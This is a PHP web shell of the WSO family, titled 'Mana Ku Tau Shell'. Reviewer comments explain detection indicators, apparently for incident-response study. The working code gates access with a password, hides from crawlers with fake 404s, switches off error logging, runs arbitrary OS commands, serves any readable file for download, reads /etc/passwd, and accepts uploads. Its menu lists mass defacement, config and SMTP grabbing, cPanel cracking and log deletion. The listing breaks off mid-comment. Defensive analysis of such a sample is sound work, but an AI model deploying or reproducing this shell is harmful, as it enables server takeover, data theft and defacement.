  1. <?php
  // Runtime setup for the script. Error reporting, PHP error logging and on-screen
  // errors are all switched off and the execution time limit is removed, so a failure
  // inside this file leaves nothing in the PHP error log. Detection has to rely on
  // web-server access logs, file-integrity monitoring and process telemetry instead.
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  // set_magic_quotes_runtime() exists only in PHP < 7.0.
  // NOTE(review): on PHP 7+ an undefined-function call is fatal even behind '@', which
  // suggests the sample targets PHP 5.x hosts - compare with the host's PHP version
  // when scoping an incident.
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  // error_log is cleared and log_errors is turned off for this request only; the
  // server-wide php.ini is not modified by these calls.
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  // Operator configuration.
  // $auth_pass is a 32-hex-digit digest; the login gate later in the file compares it
  // with md5() of the submitted password. The literal is a stable static indicator
  // for this sample.
  13. $auth_pass = "9ac65ba3c9df0006a89113889e9c8e8b";
  // The next four settings are not read anywhere in the visible part of the listing.
  // NOTE(review): the variable names and the 'FilesMan' value match the configuration
  // header of the WSO web-shell family, which signature scanners commonly key on.
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  // Crawler cloaking: a request whose User-Agent contains any of these substrings
  // (case-insensitive) receives a bare 404 and the script exits before the login page.
  // A scanner or uptime check that sends a bot-like User-Agent will therefore see
  // "not found" for a file that exists on disk; compare HTTP status against the
  // filesystem rather than trusting the response code.
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <link rel="icon" href="http://seegrastreadores.com.br/mina.png" type="image/x-icon"/>
  31. <title>Mana Ku Tau Private Shell !!!</title>
  32. <style type="text/css">
  33. html {
  34. margin: 20px auto;
  35. background: #000000;
  36. color: cyan;
  37. text-align: center;
  38. }
  39. header {
  40. color: cyan;
  41. margin: 10px auto;
  42. }
  43. input[type=password] {
  44. width: 250px;
  45. height: 25px;
  46. color: red;
  47. background: #000000;
  48. border: black;
  49. padding: 5px;
  50. margin-left: 20px;
  51. text-align: center;
  52. }
  53. .kedip {
  54. -webkit-animation-name: blinker;
  55. -webkit-animation-duration: 3s;
  56. -webkit-animation-timing-function: linear;
  57. -webkit-animation-iteration-count: infinite;
  58.  
  59. -moz-animation-name: blinker;
  60. -moz-animation-duration: 2s;
  61. -moz-animation-timing-function: linear;
  62. -moz-animation-iteration-count: infinite;
  63.  
  64. animation-name: blinker;
  65. animation-duration: 1s;
  66. animation-timing-function: linear;
  67. animation-iteration-count: infinite;
  68. color: green;
  69. }
  70. @-moz-keyframes blinker {
  71. 0% { opacity: 1.0; }
  72. 50% { opacity: 0.0; }
  73. 100% { opacity: 1.0; }
  74. }
  75. @-webkit-keyframes blinker {
  76. 0% { opacity: 1.0; }
  77. 50% { opacity: 0.0; }
  78. 100% { opacity: 1.0; }
  79. }
  80. @keyframes blinker {
  81. 0% { opacity: 1.0; }
  82. 50% { opacity: 0.0; }
  83. 100% { opacity: 1.0; }
  84. }
  85. </style>
  86. </head>
  87. <script language='javascript'>
  88. if (document.all||document.getElementById){
  89. var thetitle=document.title
  90. document.title=''
  91. }
  92. var data="abcdefghijklmnopqrstuvwxyz";
  93. var done=1;
  94. function statusIn(text){
  95. decrypt(text,5,50);
  96. }
  97. function statusOut(){
  98. self.status='';
  99. done=1;
  100. }
  101. function decrypt(text, max, delay){
  102. if (done){
  103. done = 0;
  104. rantit(text, max, delay, 0, max);
  105. }
  106. }
  107. function rantit(text, runs_left, delay, charvar, max){
  108. if (!done){
  109. runs_left = runs_left - 1;
  110. var status = text.substring(0,charvar);
  111. for(var current_char = charvar; current_char < text.length; current_char++){
  112. status += data.charAt(Math.round(Math.random()*data.length));
  113. }
  114. document.title = status;
  115. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  116. var new_char = charvar + 1;
  117. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  118. if(runs_left > 0){
  119. setTimeout(rerun, delay);
  120. }
  121. else{
  122. if (charvar < text.length){
  123. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  124. }
  125. else
  126. {
  127. done = 1;
  128. }
  129. }
  130. }
  131. }
  132. if (document.all||document.getElementById)
  133. statusIn(thetitle)
  134. </script>
  135. <center>
  136. <header>
  137. <pre>
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148. ,----------------, ,---------,
  149. ,-----------------------, ," ,"|
  150. ," ,"| ," ," |
  151. +-----------------------+ | ," ," |
  152. | .-----------------. | | +---------+ |
  153. | | | | | | -==----'| |
  154. | | I LOVE YOU! | | | | | |
  155. | | Bad command or | | |/----|`---= | |
  156. | | C:\>_ | | | ,/|==== ooo | ;
  157. | | | | | // |(((( [33]| ,"
  158. | `-----------------' |," .;'| |(((( | ,"
  159. +-----------------------+ ;; | | |," -Idiot BlackHat-
  160. /_)______________(_/ //' | +---------+
  161. ___________________________/___ `,
  162. / oooooooooooooooo .o. oooo /, \,"-----------
  163. / ==ooooooooooooooo==.o. ooo= // ,`\--{)B ,"
  164. /_==__==========__==_ooo__ooo=_/' /___________,"
  165.  
  166.  
  167.  
  168. <pre class='kedip'>
  169. __________ .___ .__
  170. \______ \ ________________ ____ __| _/____ | |
  171. | | _// __ \_ __ \__ \ / \ / __ |\__ \ | |
  172. | | \ ___/| | \// __ \| | \/ /_/ | / __ \| |__
  173. |______ /\___ >__| (____ /___| /\____ |(____ /____/
  174. \/ \/ \/ \/ \/ \/
  175. </pre></pre>
  176. </header>
  177. <form method="post">
  178. <input type="password" name="pass">
  179. </form>
  180. <?php
  181. exit;
  182. }
  // Access gate. The "logged in" flag is a session entry keyed by md5() of the Host
  // header. It is set when $auth_pass is empty, or when md5() of the POSTed 'pass'
  // field loosely equals (==) $auth_pass; otherwise login_shell() prints the password
  // form and exits, so nothing below runs without the flag.
  // Log hunting: the login is a POST carrying a single 'pass' field to this file,
  // typically followed by GET requests with 'dir=' / 'do=' query parameters.
  183. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  184. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  185. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  186. else
  187. login_shell();
  // File download handler: streams the path given in $_GET['file'] back as an
  // attachment. The path is used as supplied, so any file readable by the PHP
  // process can be retrieved; treat every 'act=download&file=...' entry in the
  // access log as a record of what was exfiltrated.
  // $_GET['act'] is read without an isset() check.
  188. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  189. @ob_clean();
  190. $file = $_GET['file'];
  191. header('Content-Description: File Transfer');
  192. header('Content-Type: application/octet-stream');
  193. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  194. header('Expires: 0');
  195. header('Cache-Control: must-revalidate');
  196. header('Pragma: public');
  197. header('Content-Length: ' . filesize($file));
  198. readfile($file);
  199. exit;
  200. }
  201. ?>
  202. <html>
  203. <head>
  204. <link rel="icon" href="http://seegrastreadores.com.br/natal2015/images/logo.jpeg" type="image/x-icon"/>
  205. <title>Mana Ku Tau Shell !!!</title>
  206. <meta name='author' content='berandal'>
  207. <meta charset="UTF-8">
  208. <style type='text/css'>
  209. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  210. html {
  211. background: #000000;
  212. color: #ffffff;
  213. font-family: 'Ubuntu';
  214. font-size: 13px;
  215. width: 100%;
  216. }
  217. li {
  218. display: inline;
  219. margin: 5px;
  220. padding: 5px;
  221. }
  222. table, th, td {
  223. border-collapse:collapse;
  224. font-family: Tahoma, Geneva, sans-serif;
  225. background: transparent;
  226. font-family: 'Ubuntu';
  227. font-size: 13px;
  228. }
  229. .table_home, .th_home, .td_home {
  230. border: 1px solid #ffffff;
  231. }
  232. .table_home td:hover {
  233. background: #635F5F;
  234. }
  235. th {
  236. padding: 10px;
  237. border-color: #BDBDBD;
  238. }
  239. a {
  240. color: #ffffff;
  241. text-decoration: none;
  242. }
  243. a:hover {
  244. color: cyan;
  245. text-decoration: underline;
  246. }
  247. b {
  248. color: gold;
  249. }
  250. input[type=text], input[type=password],input[type=submit] {
  251. background: transparent;
  252. color: #ffffff;
  253. border: 1px solid #ffffff;
  254. margin: 5px auto;
  255. padding-left: 5px;
  256. font-family: 'Ubuntu';
  257. font-size: 13px;
  258. }
  259. textarea {
  260. border: 1px solid #ffffff;
  261. width: 100%;
  262. height: 400px;
  263. padding-left: 5px;
  264. margin: 10px auto;
  265. resize: none;
  266. background: transparent;
  267. color: #ffffff;
  268. font-family: 'Ubuntu';
  269. font-size: 13px;
  270. }
  271. select {
  272. width: 152px;
  273. background: #000000;
  274. color: cyan;
  275. border: 1px solid #ffffff;
  276. margin: 5px auto;
  277. padding-left: 5px;
  278. font-family: 'Ubuntu';
  279. font-size: 13px;
  280. }
  281. option:hover {
  282. background: cyan;
  283. color: #000000;
  284. }
  285. .muter {
  286. onmousedown:stop;
  287. animation-name: rotate ;
  288. animation-duration: 5s;
  289. animation-play-state: running;
  290. animation-timing-function: linear;
  291. animation-iteration-count: infinite;
  292. opacity: 1.0;filter: alpha(opacity=50);}
  293.  
  294. .muter:hover {opacity: 1.0;filter: alpha(opacity=100);}
  295.  
  296. @keyframes rotate{
  297. 10% {transform:rotateY(36deg)}
  298. 20% {transform:rotateY(72deg)}
  299. 30% {transform:rotateY(108deg)}
  300. 40% {transform:rotateY(144deg)}
  301. 50% {transform:rotateY(180deg)}
  302. 60% {transform:rotateY(216deg)}
  303. 70% {transform:rotateY(252deg)}
  304. 80% {transform:rotateY(288deg)}
  305. 90% {transform:rotateY(324deg)}
  306. 100% {transform:rotateY(360deg)}
  307. }
  308. .phpinfo table{width:100%;padding:0 0 0 0;}
  309. .phpinfo td{background:black;color:#cccccc;padding:6px 8px;;}
  310. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  311. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  312. </style>
  313. </head>
  314. <script language='javascript'>
  315. if (document.all||document.getElementById){
  316. var thetitle=document.title
  317. document.title=''
  318. }
  319. var data="abcdefghijklmnopqrstuvwxyz";
  320. var done=1;
  321. function statusIn(text){
  322. decrypt(text,5,50);
  323. }
  324. function statusOut(){
  325. self.status='';
  326. done=1;
  327. }
  328. function decrypt(text, max, delay){
  329. if (done){
  330. done = 0;
  331. rantit(text, max, delay, 0, max);
  332. }
  333. }
  334. function rantit(text, runs_left, delay, charvar, max){
  335. if (!done){
  336. runs_left = runs_left - 1;
  337. var status = text.substring(0,charvar);
  338. for(var current_char = charvar; current_char < text.length; current_char++){
  339. status += data.charAt(Math.round(Math.random()*data.length));
  340. }
  341. document.title = status;
  342. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  343. var new_char = charvar + 1;
  344. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  345. if(runs_left > 0){
  346. setTimeout(rerun, delay);
  347. }
  348. else{
  349. if (charvar < text.length){
  350. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  351. }
  352. else
  353. {
  354. done = 1;
  355. }
  356. }
  357. }
  358. }
  359. if (document.all||document.getElementById)
  360. statusIn(thetitle)
  361. </script>
  362. <?php
  /**
   * Wrap $perm in a <font> tag coloured by writability of $dir:
   * cyan when is_writable($dir) is true, red otherwise.
   * $perm is placed into the markup as-is, without HTML escaping.
   */
  function w($dir,$perm) {
      $colour = is_writable($dir) ? 'cyan' : 'red';
      return "<font color=" . $colour . ">" . $perm . "</font>";
  }
  /**
   * Wrap $perm in a <font> tag coloured by readability of $dir:
   * cyan when is_readable($dir) is true, red otherwise.
   * $perm is placed into the markup as-is, without HTML escaping.
   */
  function r($dir,$perm) {
      $colour = is_readable($dir) ? 'cyan' : 'red';
      return "<font color=" . $colour . ">" . $perm . "</font>";
  }
  // Runs $cmd as an operating-system command with the privileges of the PHP process
  // and returns whatever the command printed.
  // The four PHP execution functions are tried in a fixed order - system(), exec(),
  // passthru(), shell_exec() - and the first one for which function_exists() is true
  // is used. If none is available the function falls off the end and returns nothing.
  // Every call is prefixed with '@', so PHP warnings from a failed call are hidden.
  // Defender view: each successful call shows up as a child process of the web
  // server / PHP worker, which is the most reliable place to detect it; listing all
  // four functions in php.ini disable_functions leaves this wrapper with no usable
  // branch.
  377. function exe($cmd) {
  378. if(function_exists('system')) {
  // system() prints directly, so output buffering is used to capture it.
  379. @ob_start();
  380. @system($cmd);
  381. $buff = @ob_get_contents();
  382. @ob_end_clean();
  383. return $buff;
  384. } elseif(function_exists('exec')) {
  385. @exec($cmd,$results);
  386. $buff = "";
  // Output lines are concatenated with no separator between them.
  387. foreach($results as $result) {
  388. $buff .= $result;
  389. } return $buff;
  390. } elseif(function_exists('passthru')) {
  391. @ob_start();
  392. @passthru($cmd);
  393. $buff = @ob_get_contents();
  394. @ob_end_clean();
  395. return $buff;
  396. } elseif(function_exists('shell_exec')) {
  397. $buff = @shell_exec($cmd);
  398. return $buff;
  399. }
  400. }
  /**
   * Render the mode of $file as a 10-character "ls -l" style string:
   * one file-type character followed by the owner, group and world triads.
   */
  function perms($file){
      $mode = fileperms($file);

      // File-type masks are tested in this order; the first full match wins.
      $typeMasks = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );
      $text = 'u'; // unknown unless a mask matches
      foreach ($typeMasks as $mask => $letter) {
          if (($mode & $mask) == $mask) {
              $text = $letter;
              break;
          }
      }

      // read bit, write bit, execute bit, special bit, letter with x, letter without x
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
      );
      foreach ($triads as $triad) {
          list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;
          $text .= ($mode & $readBit) ? 'r' : '-';
          $text .= ($mode & $writeBit) ? 'w' : '-';
          if ($mode & $execBit) {
              $text .= ($mode & $specialBit) ? $withExec : 'x';
          } else {
              $text .= ($mode & $specialBit) ? $withoutExec : '-';
          }
      }
      return $text;
  }
  /**
   * Format a byte count $s with a binary unit suffix.
   * Values of 1024 and above are shown with two decimals in KB, MB or GB;
   * smaller values are returned unchanged followed by ' B'.
   */
  function hdd($s) {
      $units = array(
          ' GB' => 1073741824,
          ' MB' => 1048576,
          ' KB' => 1024,
      );
      foreach ($units as $suffix => $size) {
          if ($s >= $size) {
              return sprintf('%1.2f', $s / $size) . $suffix;
          }
      }
      return $s . ' B';
  }
  /**
   * Return the text of $param that lies between the first occurrence of $kata1
   * and the next occurrence of $kata2 after it.
   * Returns FALSE when either marker does not occur in $param at all.
   */
  function ambilKata($param, $kata1, $kata2){
      $firstMarker = strpos($param, $kata1);
      if ($firstMarker === FALSE || strpos($param, $kata2) === FALSE) {
          return FALSE;
      }
      $from = $firstMarker + strlen($kata1);
      $to = strpos($param, $kata2, $from);
      return substr($param, $from, $to - $from);
  }
  // Fetches $url with cURL and returns the response body (curl_exec() returns false
  // on failure; the handle from curl_init() is not checked before use).
  // Redirects are followed and both TLS peer and host verification are switched off,
  // so the remote endpoint's certificate is never validated.
  // Defender view: this is an outbound HTTP(S) request made by the web server
  // process itself; egress filtering or proxy logs on the web tier will record it.
  466. function getsource($url) {
  467. $curl = curl_init($url);
  468. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  469. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  470. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  471. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  472. $content = curl_exec($curl);
  473. curl_close($curl);
  474. return $content;
  475. }
  // Pages through Bing web-search results for the query string $dork via getsource()
  // and prints the host part of every result link, one per line, de-duplicated.
  // The query is concatenated into the URL without encoding, the 'first' offset
  // advances by 10 per page up to 30000, and paging stops as soon as a page has no
  // link to the next offset or a fetch fails.
  // $lll, $sss and $linksuiv are assigned but never used.
  // Defender view: a burst of requests from the web server to
  // www.bing.com/search with a stepping 'first=' parameter is the network trace of
  // this function.
  476. function bing($dork) {
  477. $npage = 1;
  478. $npages = 30000;
  479. $allLinks = array();
  480. $lll = array();
  481. while($npage <= $npages) {
  482. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  483. if($x) {
  // Result links are taken from the <h2><a href="..."> headings of the result page.
  484. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  485. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  486. $npage = $npage + 10;
  487. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  488. } else break;
  489. }
  490. $URLs = array();
  491. foreach($allLinks as $url){
  // Element 2 of the '/'-split URL is the host name (scheme://host/...).
  492. $exp = explode("/", $url);
  493. $URLs[] = $exp[2];
  494. }
  495. $array = array_filter($URLs);
  496. $array = array_unique($array);
  497. $sss = count(array_unique($array));
  498. foreach($array as $domain) {
  499. echo $domain."\n";
  500. }
  501. }
  // Sends $url as the 'remoteAddress' field of a POST to
  // domains.yougetsignal.com/domains.php and prints each entry of the reply as an
  // "http://..." line, flushing output after every line.
  // The reply is not parsed as JSON: brackets, braces and quotes are stripped with a
  // chain of str_replace() calls and the remainder is split on ",,"; the first
  // element is discarded.
  // Defender view: an outbound POST from the web server to that host is the network
  // trace of this function.
  502. function reverse($url) {
  503. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  504. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  505. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  506. curl_setopt($ch, CURLOPT_HEADER, 0);
  507. curl_setopt($ch, CURLOPT_POST, 1);
  508. $resp = curl_exec($ch);
  509. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  510. $array = explode(",,", $resp);
  511. unset($array[0]);
  512. foreach($array as $lnk) {
  513. $lnk = "http://$lnk";
  514. $lnk = str_replace(",", "", $lnk);
  515. echo $lnk."\n";
  516. ob_flush();
  517. flush();
  518. }
  519. curl_close($ch);
  520. }
  // When magic quotes are active, strip the automatically added backslashes from
  // $_POST and $_COOKIE (recursively for nested arrays). $_GET is left as-is.
  // get_magic_quotes_gpc() was removed in PHP 8.0, another sign that the script
  // was written for legacy PHP versions.
  521. if(get_magic_quotes_gpc()) {
  522. function berandal_ss($array) {
  523. return is_array($array) ? array_map('berandal_ss', $array) : stripslashes($array);
  524. }
  525. $_POST = berandal_ss($_POST);
  526. $_COOKIE = berandal_ss($_COOKIE);
  527. }
  528.  
  // Host reconnaissance that runs on every authenticated page load. The results are
  // printed in the banner that follows this block.
  // The working directory is taken from $_GET['dir'] without any restriction, so
  // every relative path used later resolves wherever the operator points it.
  529. if(isset($_GET['dir'])) {
  530. $dir = $_GET['dir'];
  531. chdir($dir);
  532. } else {
  533. $dir = getcwd();
  534. }
  535. $kernel = php_uname();
  536. $admin_id=$_SERVER['SERVER_ADMIN'];
  537. $software = getenv("SERVER_SOFTWARE");
  // Reads the BIND configuration and the local account list; failures are hidden
  // by '@'. On a hardened host the PHP user should not be able to read named.conf,
  // and open_basedir would block both reads.
  538. $d0mains = @file("/etc/named.conf");
  539. $users=@file('/etc/passwd');
  540. if($d0mains)
  541. {
  // No-op statement: $count is never initialised before it is incremented below.
  542. $count;
  543. foreach($d0mains as $d0main)
  544. {
  // Counts 'zone "<name>"' lines to estimate how many sites share the server.
  // ereg() was removed in PHP 7.0.
  545. if(@ereg("zone",$d0main))
  546. {
  547. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  548. flush();
  549. if(strlen(trim($domains[1][0])) > 2)
  550. {
  551. flush();
  552. $count++;
  553. }
  554. }
  555. }
  556. }
  557. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  558. $dir = str_replace("\\","/",$dir);
  559. $scdir = explode("/", $dir);
  560. $freespace = hdd(disk_free_space("/"));
  561. $total = hdd(disk_total_space("/"));
  // Both operands are already strings formatted by hdd(), so this subtraction is
  // not a byte-accurate "used space" figure.
  562. $used = $total - $freespace;
  563. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=cyan>OFF</font>";
  // The shell reports the host's disable_functions list and which helpers exist.
  564. $ds = @ini_get("disable_functions");
  565. $mysql = (function_exists('mysql_connect')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  566. $curl = (function_exists('curl_version')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  // Three commands are executed through exe() on every page view. A web server or
  // PHP worker repeatedly spawning 'wget --help', 'perl --help' and 'python --help'
  // is a distinctive process-creation pattern worth alerting on.
  567. $wget = (exe('wget --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  568. $perl = (exe('perl --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  569. $python = (exe('python --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  570. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=cyan>NONE</font>";
  // Identity of the PHP process: POSIX calls when available, otherwise the
  // script-owner based fallbacks with the group shown as "?".
  571. if(!function_exists('posix_getegid')) {
  572. $user = @get_current_user();
  573. $uid = @getmyuid();
  574. $gid = @getmygid();
  575. $group = "?";
  576. } else {
  577. $uid = @posix_getpwuid(posix_geteuid());
  578. $gid = @posix_getgrgid(posix_getegid());
  579. $user = $uid['name'];
  580. $uid = $uid['uid'];
  581. $group = $gid['name'];
  582. $gid = $gid['gid'];
  583. }
  // Banner and navigation menu. All values ($kernel, $dir, $admin_id, REMOTE_ADDR,
  // ...) are written into the HTML without escaping.
  // The logo is loaded from a third-party host by the operator's browser, not by the
  // server; the URL string itself is a static indicator for this sample.
  584. echo "<img src='http://seegrastreadores.com.br/natal2015/images/logo.jpeg' width='200px' height='200px' class='muter' style='float: left;'>";
  585. echo "System: <font color=cyan>".$kernel."</font><br>";
  586. echo "User: <font color=cyan>".$user."</font> (".$uid.") Group: <font color=cyan>".$group."</font> (".$gid.")<br>";
  587. echo "Server IP: <font color=cyan>".$ip."</font> | Your IP: <font color=cyan>".$_SERVER['REMOTE_ADDR']."</font><br>";
  588. echo "PHP Version : ".phpversion()." <font color='white'> on</font> ".php_sapi_name()." <font class='asu'>[<a href='?dir=$dir&do=phinfo'>PHP Info</a>]</font><br>";
  589. echo "Admin : <font color=cyan>".$admin_id."</font> | Websites: <font color=cyan>$count</font> Domains<br>";
  590. echo "HDD: <font color=cyan>$used</font> / <font color=cyan>$total</font> ( Free: <font color=cyan>$freespace</font> )<br>";
  591. echo "Safe Mode: $sm<br>";
  592. echo "Disable Functions: $show_ds<br>";
  593. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  // Breadcrumb: one link per path component of the current directory.
  594. echo "Current DIR: ";
  595. foreach($scdir as $c_dir => $cdir) {
  596. echo "<a href='?dir=";
  597. for($i = 0; $i <= $c_dir; $i++) {
  598. echo $scdir[$i];
  599. if($i != $c_dir) {
  600. echo "/";
  601. }
  602. }
  603. echo "'>$cdir</a>/";
  604. }
  605. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  606. echo "<br><br><br>";
  607. echo "<hr>";
  608. echo "<center>";
  // The menu fixes the query-string vocabulary of this shell. For access-log
  // hunting, look for requests to a single PHP file carrying 'dir=' together with
  // 'do=<action>', 'config=grabber', 'delete=logs' or 'logout=true'; the action
  // names requested also tell an investigator which features were used.
  // NOTE(review): the handler behind 'delete=logs' is not in the visible part of the
  // listing; the label suggests log tampering, so assume local logs may be
  // incomplete and prefer off-host copies.
  609. echo "<ul>";
  610. echo "<li><font color='cyan'>[</font> <a href='?'>Home</a> <font color='cyan'>]</font></li>";
  611. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=upload'>Upload</a> <font color='cyan'>]</font></li>";
  612. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cmd'>Command</a> <font color='cyan'>]</font></li>";
  613. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> <font color='cyan'>]</font></li>";
  614. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&config=grabber'>Config</a> <font color='cyan'>]</font></li>";
  615. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=jumping'>Jumping</a> <font color='cyan'>]</font></li>";
  616. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=symlink'>Symlink</a> <font color='cyan'>]</font></li>";
  617. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> <font color='cyan'>]</font></li>";
  618. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> <font color='cyan'>]</font></li><br>";
  619. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=loghunter'>LogHunter</a> <font color='cyan'>]</font></li>";
  620. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=zoneh'>Zone-H</a> <font color='cyan'>]</font></li>";
  621. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> <font color='cyan'>]</font></li>";
  622. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=adminer'>Adminer</a> <font color='cyan'>]</font></li>";
  623. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=csrf'>CSRF</a> <font color='cyan'>]</font></li>";
  624. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=fake_root'>Fake Root</a> <font color='cyan'>]</font></li>";
  625. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> <font color='cyan'>]</font></li>";
  626. echo "<li><font color='cyan'>[</font> <a href='?dir=$dir&delete=logs'>Delete Logs</a> <font color='cyan'>]</font></li>";
  627. echo "<li><font color='cyan'>[</font> <a style='color: red;' href='?logout=true'>Logout</a> <font color='cyan'>]</font></li>";
  628. echo "</ul>";
  629. echo "</center>";
  630. echo "<hr>";
  631. if($_GET['logout'] == true) {
  632. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  633. echo "<script>window.location='?';</script>";
  634. } elseif($_GET['do'] == 'upload') {
  635. echo "<center>";
  636. if($_POST['upload']) {
  637. if($_POST['tipe_upload'] == 'biasa') {
  638. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  639. $act = "<font color=cyan>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  640. } else {
  641. $act = "<font color=red>failed to upload file</font>";
  642. }
  643. } else {
  644. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  645. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  646. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  647. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  648. $act = "<font color=cyan>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  649. } else {
  650. $act = "<font color=red>failed to upload file</font>";
  651. }
  652. } else {
  653. $act = "<font color=red>failed to upload file</font>";
  654. }
  655. }
  656. }
  657. echo "Upload File:
  658. <form method='post' enctype='multipart/form-data'>
  659. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  660. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  661. <input type='file' name='ix_file'>
  662. <input type='submit' value='upload' name='upload'>
  663. </form>";
  664. echo $act;
  665. echo "</center>";
  666. } elseif($_GET['do'] == 'cmd') {
  667. echo "<form method='post'>
  668. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  669. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  670. </form>";
  671. if($_POST['do_cmd']) {
  672. echo "<pre>".exe($_POST['cmd'])."</pre>";
  673. }
  674. } elseif($_GET['do'] == 'mass_deface') {
  // Recursive variant of the defacement writer. When $dir is writable, it writes
  // $isi_script to a file named $namafile in $dir itself and in the parent of $dir
  // (the '.' and '..' entries returned by scandir() are written to, not skipped),
  // then in every writable sub-directory, descending into each one.
  // file_put_contents() overwrites an existing file of the same name, so original
  // content is lost and has to come back from backup or version control.
  // Incident scoping: affected files share one name, identical content and nearly
